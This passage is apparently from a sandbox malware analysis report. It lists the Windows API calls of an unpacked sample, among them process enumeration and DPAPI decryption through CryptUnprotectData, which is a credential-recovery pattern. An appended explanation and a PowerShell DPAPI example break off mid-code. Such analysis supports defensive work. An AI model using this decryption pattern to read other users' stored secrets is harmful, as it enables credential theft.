                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: a44eeb7e6d0ac43ca31760b063318f7d7c5191bb1a165bb59c3840dae5ee9d98
                              • Instruction ID: aecfd82babd7c03ace062bf0abff807efb5e41202bff668244896036469b7f72
                              • Opcode Fuzzy Hash: a44eeb7e6d0ac43ca31760b063318f7d7c5191bb1a165bb59c3840dae5ee9d98
                              • Instruction Fuzzy Hash: 9D012175B40308BFEB20DB94DC4AFAA7B78EB44B15F104155FB49EB2C4D6B5A900CB90
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !r~B$CZ;e$K"+i$O"+i
                              • API String ID: 0-4002564735
                              • Opcode ID: ce03117a56d0e50c3a3d61c88a65f4660e30f99840c398a27ba8194f373d7c97
                              • Instruction ID: f0125031c3ed12f3f1e23267fe00b2207385e74d1d4e0d70b4f34f7a5701ba9c
                              • Opcode Fuzzy Hash: ce03117a56d0e50c3a3d61c88a65f4660e30f99840c398a27ba8194f373d7c97
                              • Instruction Fuzzy Hash: A2B2F8F360C2049FE304AE2DEC8567AFBE9EF94720F16853DE6C4C7744EA3598058696
                              APIs
                                • Part of subcall function 00E571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E571FE
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E53A96
                              • Process32First.KERNEL32(00000000,00000128), ref: 00E53AA9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E53ABF
                                • Part of subcall function 00E57310: lstrlen.KERNEL32(------,00E35BEB), ref: 00E5731B
                                • Part of subcall function 00E57310: lstrcpy.KERNEL32(00000000), ref: 00E5733F
                                • Part of subcall function 00E57310: lstrcat.KERNEL32(?,------), ref: 00E57349
                                • Part of subcall function 00E57280: lstrcpy.KERNEL32(00000000), ref: 00E572AE
                              • CloseHandle.KERNEL32(00000000), ref: 00E53BF7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: dbeb405b035ad61a6b363e3f3beb79c4ded66ed684740d89555f2ddc0cb0ee5e
                              • Instruction ID: fa823d023a5153ca4094e5d9c73cecf5827190656e11a6f37ad4483d6e9838a1
                              • Opcode Fuzzy Hash: dbeb405b035ad61a6b363e3f3beb79c4ded66ed684740d89555f2ddc0cb0ee5e
                              • Instruction Fuzzy Hash: 9A81F870900204CFC764CF28D948B95B7F1FB4435AF29D5ADD848AB2A2D77A9D8ACF50
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00E3EA76
                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00E3EA7E
                              • lstrcat.KERNEL32(00E5CFEC,00E5CFEC), ref: 00E3EB27
                              • lstrcat.KERNEL32(00E5CFEC,00E5CFEC), ref: 00E3EB49
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: f4cbd1416c29cb5db726d43dd3394f627e8de2fa7d8f9b711a772a50dc38457d
                              • Instruction ID: 9fcfeb71914d1af88ab231e7df8ba6f38bb9c978912a8eec1cc5c8397b06e27b
                              • Opcode Fuzzy Hash: f4cbd1416c29cb5db726d43dd3394f627e8de2fa7d8f9b711a772a50dc38457d
                              • Instruction Fuzzy Hash: B7319575B00319ABDB209B98EC45FEEB77D9F44709F144165FA09F3280D7B55A08CBA1
                              APIs
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00E540CD
                              • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00E540DC
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E540E3
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00E54113
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptHeapString$AllocateProcess
                              • String ID:
                              • API String ID: 3825993179-0
                              • Opcode ID: a4d87cda0b4ded6b73de06f40df04add17a078d2e758e4a025041bb4d3d6688c
                              • Instruction ID: e89505b75b115749a88d0200bea0c202fd1f29c5c0ef7b9be744b51fc30c9b04
                              • Opcode Fuzzy Hash: a4d87cda0b4ded6b73de06f40df04add17a078d2e758e4a025041bb4d3d6688c
                              • Instruction Fuzzy Hash: A5015EB0600205BFDB208FA5DC45B6ABBADEF44315F108059FE4897280DA719940CB51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00E5A3D0,000000FF), ref: 00E52B8F
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00E52B96
                              • GetLocalTime.KERNEL32(?,?,00000000,00E5A3D0,000000FF), ref: 00E52BA2
                              • wsprintfA.USER32 ref: 00E52BCE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 60392c9f81a4cd4c8d0542224564a908eaf2b89916497f5bcd8d2c891eab0534
                              • Instruction ID: 502016ba30d1fd0d16c3879ec34b0d80c9717ee1efaa1c19c036b54ca9001fe9
                              • Opcode Fuzzy Hash: 60392c9f81a4cd4c8d0542224564a908eaf2b89916497f5bcd8d2c891eab0534
                              • Instruction Fuzzy Hash: EC0140B2904228AFDB249BC9DD45BBEB7BCFB4CB15F00421AFA45A2680E77D5440C7B1
                              APIs
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E39B3B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E39B4A
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E39B61
                              • LocalFree.KERNEL32 ref: 00E39B70
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 726721e3e67a3280def231d9d9e05245e31f8b054d750b2189c3cbf9b8054ac6
                              • Instruction ID: a26f681522b9adcd071d9f98ff19f28c396ec002d1ac049ffdc2d64b67923e23
                              • Opcode Fuzzy Hash: 726721e3e67a3280def231d9d9e05245e31f8b054d750b2189c3cbf9b8054ac6
                              • Instruction Fuzzy Hash: 2AF01D703443126FF7301F64AC49F567BA8EF04B54F200114FA45EA2D4D7B69840CBA4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 45};$G=eo$Rf}
                              • API String ID: 0-3202768079
                              • Opcode ID: ce8b2ecac9ca1f010791dec19d3e79fe4f5eb133b42bc2e29fdb284fbc0b79b2
                              • Instruction ID: d752ce57dc56f38e02c82c3dbf19297d17681dc59fa11d882d64a561e9cc9209
                              • Opcode Fuzzy Hash: ce8b2ecac9ca1f010791dec19d3e79fe4f5eb133b42bc2e29fdb284fbc0b79b2
                              • Instruction Fuzzy Hash: 57A2F4F350C2049FE304AF29DC8567AFBE9EF94720F1A493DEAC4C7744EA3558418696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: []}$i}$|ko
                              • API String ID: 0-3600771878
                              • Opcode ID: 4954ca911efdc282065005a299f717c25cc36071d3ee0260b25204b02c3c7d51
                              • Instruction ID: 3e509a54c3a0561324ddad1e964e88e1a3acd1d07acb7d606e603adbf06b5cb7
                              • Opcode Fuzzy Hash: 4954ca911efdc282065005a299f717c25cc36071d3ee0260b25204b02c3c7d51
                              • Instruction Fuzzy Hash: E8A2E3F360C204AFE3046F29EC8567AFBE9EB94720F16493DE6C587744EA3598058787
                              APIs
                              • CoCreateInstance.COMBASE(00E5B110,00000000,00000001,00E5B100,?), ref: 00E4CB06
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00E4CB46
                              • lstrcpyn.KERNEL32(?,?,00000104), ref: 00E4CBC9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                              • String ID:
                              • API String ID: 1940255200-0
                              • Opcode ID: 99d03a26dee7debe3b0830e90a9cd18c94feb91cbee5eccae5402de78c3bb494
                              • Instruction ID: da46e6a3fa9cabfa1dabd86d3caf317564b327f598b20fadcb633f39bd4d36ec
                              • Opcode Fuzzy Hash: 99d03a26dee7debe3b0830e90a9cd18c94feb91cbee5eccae5402de78c3bb494
                              • Instruction Fuzzy Hash: FF317571A41718BFD754DB94CC82FAAB7B9DB88B10F104584FA44EB2D0D7B1AE44CB90
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E39B9F
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00E39BB3
                              • LocalFree.KERNEL32(?), ref: 00E39BD7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: fed3ee901d711fa1823843e32a0ba56fe27f49a1c501ca42d34ddb7cb0dfa805
                              • Instruction ID: f16633f7a1eaf696929c16232073ae3374e243e5ee2cd178aa076d9bf36fa1ec
                              • Opcode Fuzzy Hash: fed3ee901d711fa1823843e32a0ba56fe27f49a1c501ca42d34ddb7cb0dfa805
                              • Instruction Fuzzy Hash: 3A016DB5A01309AFE710DFA4DC49FABB778EB44B04F104554FA00AB284D7B59A00CBE4
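                               The three calls listed for the function above are the Windows DPAPI decryption pattern: CryptUnprotectData is invoked with every optional argument zero (no description pointer, no optional entropy, no prompt structure, flags 0), so a blob protected under the calling user's account is decrypted with no key material supplied by the caller; LocalAlloc with flag 0x40 (LMEM_ZEROINIT) obtains a zero-initialised fixed buffer; and LocalFree releases memory, which is also how the output buffer DPAPI returns must be released. The PowerShell below is an added illustration of that pattern and is not code from the sample or from the report. It goes through the .NET ProtectedData wrapper, which calls the same crypt32 functions, and the protected value and entropy bytes are constructed for the demonstration. It runs on Windows only.

```powershell
# Added illustration of the DPAPI pattern (CryptUnprotectData / LocalAlloc /
# LocalFree) seen in the listing. Not the sample's code. The .NET ProtectedData
# class wraps CryptProtectData / CryptUnprotectData; CurrentUser scope matches
# dwFlags = 0 in the native call. Windows only.
Add-Type -AssemblyName System.Security

function Protect-Secret {
    param(
        [Parameter(Mandatory)][string]$PlainText,
        [byte[]]$Entropy = $null          # maps to pOptionalEntropy; NULL in the sample
    )
    $bytes = [Text.Encoding]::UTF8.GetBytes($PlainText)
    [Security.Cryptography.ProtectedData]::Protect(
        $bytes, $Entropy, [Security.Cryptography.DataProtectionScope]::CurrentUser)
}

function Unprotect-Secret {
    param(
        [Parameter(Mandatory)][byte[]]$Blob,
        [byte[]]$Entropy = $null
    )
    try {
        $out = [Security.Cryptography.ProtectedData]::Unprotect(
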